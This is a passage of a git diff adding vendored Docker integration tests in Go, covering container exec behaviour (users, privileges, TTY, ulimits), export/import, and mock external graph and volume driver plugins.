see exec as part of the container + out = strings.TrimSpace(inspectField(c, id, "ExecIDs")) + + if out == "[]" { + break + } + c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still not empty after 10 second")) + time.Sleep(1 * time.Second) + } + + // But we should still be able to query the execID + sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil) + c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body)) + + // Now delete the container and then an 'inspect' on the exec should + // result in a 404 (not 'container not running') + out, ec := dockerCmd(c, "rm", "-f", id) + c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out)) + sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil) + c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body)) +} + +func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) { + // Problematic on Windows as Windows does not support links + testRequires(c, DaemonIsLinux) + var out string + out, _ = dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + idA := strings.TrimSpace(out) + c.Assert(idA, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out)) + out, _ = dockerCmd(c, "run", "-d", "--link", "container1:alias1", "--name", "container2", "busybox", "top") + idB := strings.TrimSpace(out) + c.Assert(idB, checker.Not(checker.Equals), "", check.Commentf("%s, id should not be nil", out)) + + dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1") + dockerCmd(c, "rename", "container1", "container_new") + dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1") +} + +func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) { + // Not applicable on Windows to Windows CI. 
+ testRequires(c, SameHostDaemon, DaemonIsLinux) + for _, fn := range []string{"resolv.conf", "hosts"} { + deleteAllContainers() + + content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn))) + c.Assert(err, checker.IsNil) + + c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content))) + + out, _ := dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top") + contID := strings.TrimSpace(out) + netFilePath := containerStorageFile(contID, fn) + + f, err := os.OpenFile(netFilePath, os.O_WRONLY|os.O_SYNC|os.O_APPEND, 0644) + c.Assert(err, checker.IsNil) + + if _, err := f.Seek(0, 0); err != nil { + f.Close() + c.Fatal(err) + } + + if err := f.Truncate(0); err != nil { + f.Close() + c.Fatal(err) + } + + if _, err := f.Write([]byte("success2\n")); err != nil { + f.Close() + c.Fatal(err) + } + f.Close() + + res, _ := dockerCmd(c, "exec", contID, "cat", "/etc/"+fn) + c.Assert(res, checker.Equals, "success2\n") + } +} + +func (s *DockerSuite) TestExecWithUser(c *check.C) { + // TODO Windows CI: This may be fixable in the future once Windows + // supports users + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + out, _ := dockerCmd(c, "exec", "-u", "1", "parent", "id") + c.Assert(out, checker.Contains, "uid=1(daemon) gid=1(daemon)") + + out, _ = dockerCmd(c, "exec", "-u", "root", "parent", "id") + c.Assert(out, checker.Contains, "uid=0(root) gid=0(root)", check.Commentf("exec with user by id expected daemon user got %s", out)) +} + +func (s *DockerSuite) TestExecWithPrivileged(c *check.C) { + // Not applicable on Windows + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Start main loop which attempts mknod repeatedly + dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", 
"-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`) + + // Check exec mknod doesn't work + cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16") + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + + // Check exec mknod does work with --privileged + cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil) + + actual := strings.TrimSpace(out) + c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out)) + + // Check subsequent unprivileged exec cannot mknod + cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32") + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) + c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) + + // Confirm at no point was mknod allowed + logCmd := exec.Command(dockerBinary, "logs", "parent") + out, _, err = runCommandWithOutput(logCmd) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Success") + +} + +func (s *DockerSuite) TestExecWithImageUser(c *check.C) { + // Not 
applicable on Windows + testRequires(c, DaemonIsLinux) + name := "testbuilduser" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + USER dockerio`, + true) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top") + + out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami") + c.Assert(out, checker.Contains, "dockerio", check.Commentf("exec with user by id expected dockerio user got %s", out)) +} + +func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) { + // Windows does not support read-only + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", "-d", "--read-only", "--name", "parent", "busybox", "top") + dockerCmd(c, "exec", "parent", "true") +} + +func (s *DockerSuite) TestExecUlimits(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testexeculimits" + runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name) + c.Assert(waitRun(name), checker.IsNil) + + out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "21") +} + +// #15750 +func (s *DockerSuite) TestExecStartFails(c *check.C) { + // TODO Windows CI. This test should be portable. Figure out why it fails + // currently. 
+ testRequires(c, DaemonIsLinux) + name := "exec-15750" + runSleepingContainer(c, "-d", "--name", name) + c.Assert(waitRun(name), checker.IsNil) + + out, _, err := dockerCmdWithError("exec", name, "no-such-cmd") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "executable file not found") +} + +// Fix regression in https://github.com/docker/docker/pull/26461#issuecomment-250287297 +func (s *DockerSuite) TestExecWindowsPathNotWiped(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := dockerCmd(c, "run", "-d", "--name", "testing", minimalBaseImage(), "powershell", "start-sleep", "60") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + + out, _ = dockerCmd(c, "exec", "testing", "powershell", "write-host", "$env:PATH") + out = strings.ToLower(strings.Trim(out, "\r\n")) + c.Assert(out, checker.Contains, `windowspowershell\v1.0`) +} + +func (s *DockerSuite) TestExecEnvLinksHost(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-d", "--name", "foo") + runSleepingContainer(c, "-d", "--link", "foo:db", "--hostname", "myhost", "--name", "bar") + out, _ := dockerCmd(c, "exec", "bar", "env") + c.Assert(out, checker.Contains, "HOSTNAME=myhost") + c.Assert(out, checker.Contains, "DB_NAME=/bar/db") +} + +func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { + testRequires(c, DaemonIsWindows) + runSleepingContainer(c, "-d", "--name", "test") + exec := make(chan bool) + go func() { + dockerCmd(c, "exec", "test", "cmd", "/c", "start sleep 10") + exec <- true + }() + + for { + top := make(chan string) + var out string + go func() { + out, _ := dockerCmd(c, "top", "test") + top <- out + }() + + select { + case <-time.After(time.Second * 5): + c.Error("timed out waiting for top while exec is exiting") + case out = <-top: + break + } + + if strings.Count(out, "busybox.exe") == 2 && !strings.Contains(out, "cmd.exe") { + // The initial exec process (cmd.exe) has exited, and both sleeps are currently 
running + break + } + time.Sleep(1 * time.Second) + } + + inspect := make(chan bool) + go func() { + dockerCmd(c, "inspect", "test") + inspect <- true + }() + + select { + case <-time.After(time.Second * 5): + c.Error("timed out waiting for inspect while exec is exiting") + case <-inspect: + break + } + + // Ensure the background sleep is still running + out, _ := dockerCmd(c, "top", "test") + c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 2) + + // The exec should exit when the background sleep exits + select { + case <-time.After(time.Second * 15): + c.Error("timed out waiting for async exec to exit") + case <-exec: + // Ensure the background sleep has actually exited + out, _ := dockerCmd(c, "top", "test") + c.Assert(strings.Count(out, "busybox.exe"), checker.Equals, 1) + break + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go new file mode 100644 index 0000000000..5f691196f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go @@ -0,0 +1,93 @@ +// +build !windows,!test_no_exec + +package main + +import ( + "bytes" + "io" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// regression test for #12546 +func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + + cmd := exec.Command(dockerBinary, "exec", "-i", contID, "echo", "-n", "hello") + p, err := pty.Start(cmd) + c.Assert(err, checker.IsNil) + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + ch := make(chan error) + go func() { ch <- cmd.Wait() }() + + select { + case err := <-ch: + c.Assert(err, checker.IsNil) + output := b.String() + c.Assert(strings.TrimSpace(output), checker.Equals, "hello") 
+ case <-time.After(5 * time.Second): + c.Fatal("timed out running docker exec") + } +} + +func (s *DockerSuite) TestExecTTY(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + dockerCmd(c, "run", "-d", "--name=test", "busybox", "sh", "-c", "echo hello > /foo && top") + + cmd := exec.Command(dockerBinary, "exec", "-it", "test", "sh") + p, err := pty.Start(cmd) + c.Assert(err, checker.IsNil) + defer p.Close() + + _, err = p.Write([]byte("cat /foo && exit\n")) + c.Assert(err, checker.IsNil) + + chErr := make(chan error) + go func() { + chErr <- cmd.Wait() + }() + select { + case err := <-chErr: + c.Assert(err, checker.IsNil) + case <-time.After(3 * time.Second): + c.Fatal("timeout waiting for exec to exit") + } + + buf := make([]byte, 256) + read, err := p.Read(buf) + c.Assert(err, checker.IsNil) + c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read]))) +} + +// Test the the TERM env var is set when -t is provided on exec +func (s *DockerSuite) TestExecWithTERM(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + cmd := exec.Command(dockerBinary, "exec", "-t", contID, "sh", "-c", "if [ -z $TERM ]; then exit 1; else exit 0; fi") + if err := cmd.Run(); err != nil { + c.Assert(err, checker.IsNil) + } +} + +// Test that the TERM env var is not set on exec when -t is not provided, even if it was set +// on run +func (s *DockerSuite) TestExecWithNoTERM(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + out, _ := dockerCmd(c, "run", "-itd", "busybox", "/bin/cat") + contID := strings.TrimSpace(out) + cmd := exec.Command(dockerBinary, "exec", contID, "sh", "-c", "if [ -z $TERM ]; then exit 0; else exit 1; fi") + if err := cmd.Run(); err != nil { + c.Assert(err, checker.IsNil) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go new file mode 100644 index 0000000000..6a49cc8cb1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go @@ -0,0 +1,36 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) { + testRequires(c, ExperimentalDaemon) + + out, _ := dockerCmd(c, "version") + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { + c.Assert(line, checker.Matches, "*true") + return + } + } + + c.Fatal(`"Experimental" not found in version output`) +} + +func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) { + testRequires(c, NotExperimentalDaemon) + + out, _ := dockerCmd(c, "version") + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { + c.Assert(line, checker.Matches, "*false") + return + } + } + + c.Fatal(`"Experimental" not found in version output`) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go new file mode 100644 index 0000000000..069dc08162 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go @@ -0,0 +1,49 @@ +package main + +import ( + "os" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// export an image and try to import it into a new one +func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := "testexportcontainerandimportimage" + + dockerCmd(c, "run", "--name", containerID, "busybox", "true") + + out, _ := dockerCmd(c, "export", containerID) + + importCmd := 
exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") + importCmd.Stdin = strings.NewReader(out) + out, _, err := runCommandWithOutput(importCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + + cleanedImageID := strings.TrimSpace(out) + c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) +} + +// Used to test output flag in the export command +func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := "testexportcontainerwithoutputandimportimage" + + dockerCmd(c, "run", "--name", containerID, "busybox", "true") + dockerCmd(c, "export", "--output=testexp.tar", containerID) + defer os.Remove("testexp.tar") + + out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar")) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") + importCmd.Stdin = strings.NewReader(out) + out, _, err = runCommandWithOutput(importCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + + cleanedImageID := strings.TrimSpace(out) + c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go new file mode 100644 index 0000000000..a794ca742d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go @@ -0,0 +1,405 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "strings" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/vfs" + 
"github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/plugins" + "github.com/go-check/check" +) + +func init() { + check.Suite(&DockerExternalGraphdriverSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerExternalGraphdriverSuite struct { + server *httptest.Server + jserver *httptest.Server + ds *DockerSuite + d *Daemon + ec map[string]*graphEventsCounter +} + +type graphEventsCounter struct { + activations int + creations int + removals int + gets int + puts int + stats int + cleanups int + exists int + init int + metadata int + diff int + applydiff int + changes int + diffsize int +} + +func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) +} + +func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) { + s.ec = make(map[string]*graphEventsCounter) + s.setUpPluginViaSpecFile(c) + s.setUpPluginViaJSONFile(c) +} + +func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + + s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL)) +} + +func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) { + mux := http.NewServeMux() + s.jserver = httptest.NewServer(mux) + + p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL) + b, err := json.Marshal(p) + c.Assert(err, check.IsNil) + + s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b) +} + +func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) { + type graphDriverRequest struct { + ID string `json:",omitempty"` + Parent string `json:",omitempty"` + MountLabel string `json:",omitempty"` + ReadOnly bool `json:",omitempty"` + } + + type 
graphDriverResponse struct { + Err error `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + } + + respond := func(w http.ResponseWriter, data interface{}) { + w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json") + switch t := data.(type) { + case error: + fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error())) + case string: + fmt.Fprintln(w, t) + default: + json.NewEncoder(w).Encode(&data) + } + } + + decReq := func(b io.ReadCloser, out interface{}, w http.ResponseWriter) error { + defer b.Close() + if err := json.NewDecoder(b).Decode(&out); err != nil { + http.Error(w, fmt.Sprintf("error decoding json: %s", err.Error()), 500) + } + return nil + } + + base, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + vfsProto, err := vfs.Init(base, []string{}, nil, nil) + c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver")) + driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil) + + s.ec[ext] = &graphEventsCounter{} + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].activations++ + respond(w, `{"Implements": ["GraphDriver"]}`) + }) + + mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].init++ + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].creations++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + if err := driver.CreateReadWrite(req.ID, req.Parent, nil); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].creations++ + + var req graphDriverRequest + if err := 
decReq(r.Body, &req, w); err != nil { + return + } + if err := driver.Create(req.ID, req.Parent, nil); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].removals++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + if err := driver.Remove(req.ID); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].gets++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + dir, err := driver.Get(req.ID, req.MountLabel) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Dir: dir}) + }) + + mux.HandleFunc("/GraphDriver.Put", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].puts++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + if err := driver.Put(req.ID); err != nil { + respond(w, err) + return + } + respond(w, "{}") + }) + + mux.HandleFunc("/GraphDriver.Exists", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].exists++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + respond(w, &graphDriverResponse{Exists: driver.Exists(req.ID)}) + }) + + mux.HandleFunc("/GraphDriver.Status", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].stats++ + respond(w, &graphDriverResponse{Status: driver.Status()}) + }) + + mux.HandleFunc("/GraphDriver.Cleanup", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].cleanups++ + err := driver.Cleanup() + if err != nil { + respond(w, err) + return + } + respond(w, `{}`) + }) + + mux.HandleFunc("/GraphDriver.GetMetadata", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].metadata++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return 
+ } + + data, err := driver.GetMetadata(req.ID) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Metadata: data}) + }) + + mux.HandleFunc("/GraphDriver.Diff", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].diff++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + diff, err := driver.Diff(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + io.Copy(w, diff) + }) + + mux.HandleFunc("/GraphDriver.Changes", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].changes++ + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + changes, err := driver.Changes(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Changes: changes}) + }) + + mux.HandleFunc("/GraphDriver.ApplyDiff", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].applydiff++ + diff := r.Body + defer r.Body.Close() + + id := r.URL.Query().Get("id") + parent := r.URL.Query().Get("parent") + + if id == "" { + http.Error(w, fmt.Sprintf("missing id"), 409) + } + + size, err := driver.ApplyDiff(id, parent, diff) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Size: size}) + }) + + mux.HandleFunc("/GraphDriver.DiffSize", func(w http.ResponseWriter, r *http.Request) { + s.ec[ext].diffsize++ + + var req graphDriverRequest + if err := decReq(r.Body, &req, w); err != nil { + return + } + + size, err := driver.DiffSize(req.ID, req.Parent) + if err != nil { + respond(w, err) + return + } + respond(w, &graphDriverResponse{Size: size}) + }) + + err = os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, check.IsNil, check.Commentf("error creating /etc/docker/plugins")) + + specFile := "/etc/docker/plugins/" + name + "." 
+ ext + err = ioutil.WriteFile(specFile, b, 0644) + c.Assert(err, check.IsNil, check.Commentf("error writing to %s", specFile)) +} + +func (s *DockerExternalGraphdriverSuite) TearDownSuite(c *check.C) { + s.server.Close() + s.jserver.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, check.IsNil, check.Commentf("error removing /etc/docker/plugins")) +} + +func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriver(c *check.C) { + testRequires(c, ExperimentalDaemon) + + s.testExternalGraphDriver("test-external-graph-driver", "spec", c) + s.testExternalGraphDriver("json-external-graph-driver", "json", c) +} + +func (s *DockerExternalGraphdriverSuite) testExternalGraphDriver(name string, ext string, c *check.C) { + if err := s.d.StartWithBusybox("-s", name); err != nil { + b, _ := ioutil.ReadFile(s.d.LogFileName()) + c.Assert(err, check.IsNil, check.Commentf("\n%s", string(b))) + } + + out, err := s.d.Cmd("run", "--name=graphtest", "busybox", "sh", "-c", "echo hello > /hello") + c.Assert(err, check.IsNil, check.Commentf(out)) + + err = s.d.Restart("-s", name) + + out, err = s.d.Cmd("inspect", "--format={{.GraphDriver.Name}}", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), check.Equals, name) + + out, err = s.d.Cmd("diff", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.Contains(out, "A /hello"), check.Equals, true, check.Commentf("diff output: %s", out)) + + out, err = s.d.Cmd("rm", "-f", "graphtest") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("info") + c.Assert(err, check.IsNil, check.Commentf(out)) + + err = s.d.Stop() + c.Assert(err, check.IsNil) + + // Don't check s.ec.exists, because the daemon no longer calls the + // Exists function. 
+ c.Assert(s.ec[ext].activations, check.Equals, 2) + c.Assert(s.ec[ext].init, check.Equals, 2) + c.Assert(s.ec[ext].creations >= 1, check.Equals, true) + c.Assert(s.ec[ext].removals >= 1, check.Equals, true) + c.Assert(s.ec[ext].gets >= 1, check.Equals, true) + c.Assert(s.ec[ext].puts >= 1, check.Equals, true) + c.Assert(s.ec[ext].stats, check.Equals, 5) + c.Assert(s.ec[ext].cleanups, check.Equals, 2) + c.Assert(s.ec[ext].applydiff >= 1, check.Equals, true) + c.Assert(s.ec[ext].changes, check.Equals, 1) + c.Assert(s.ec[ext].diffsize, check.Equals, 0) + c.Assert(s.ec[ext].diff, check.Equals, 0) + c.Assert(s.ec[ext].metadata, check.Equals, 1) +} + +func (s *DockerExternalGraphdriverSuite) TestExternalGraphDriverPull(c *check.C) { + testRequires(c, Network, ExperimentalDaemon) + + c.Assert(s.d.Start(), check.IsNil) + + out, err := s.d.Cmd("pull", "busybox:latest") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go new file mode 100644 index 0000000000..806d87ec77 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go @@ -0,0 +1,627 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/go-check/check" +) + +const volumePluginName = "test-external-volume-driver" + +func init() { + check.Suite(&DockerExternalVolumeSuite{ + ds: &DockerSuite{}, + }) +} + +type eventCounter struct { + 
activations int + creations int + removals int + mounts int + unmounts int + paths int + lists int + gets int + caps int +} + +type DockerExternalVolumeSuite struct { + ds *DockerSuite + d *Daemon + *volumePlugin +} + +func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) + s.ec = &eventCounter{} +} + +func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) { + s.volumePlugin = newVolumePlugin(c, volumePluginName) +} + +type volumePlugin struct { + ec *eventCounter + *httptest.Server + vols map[string]vol +} + +type vol struct { + Name string + Mountpoint string + Ninja bool // hack used to trigger a null volume return on `Get` + Status map[string]interface{} + Options map[string]string +} + +func (p *volumePlugin) Close() { + p.Server.Close() +} + +func newVolumePlugin(c *check.C, name string) *volumePlugin { + mux := http.NewServeMux() + s := &volumePlugin{Server: httptest.NewServer(mux), ec: &eventCounter{}, vols: make(map[string]vol)} + + type pluginRequest struct { + Name string + Opts map[string]string + ID string + } + + type pluginResp struct { + Mountpoint string `json:",omitempty"` + Err string `json:",omitempty"` + } + + read := func(b io.ReadCloser) (pluginRequest, error) { + defer b.Close() + var pr pluginRequest + if err := json.NewDecoder(b).Decode(&pr); err != nil { + return pr, err + } + return pr, nil + } + + send := func(w http.ResponseWriter, data interface{}) { + switch t := data.(type) { + case error: + http.Error(w, t.Error(), 500) + case string: + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, t) + default: + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + json.NewEncoder(w).Encode(&data) + } + } + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + s.ec.activations++ + send(w, `{"Implements": 
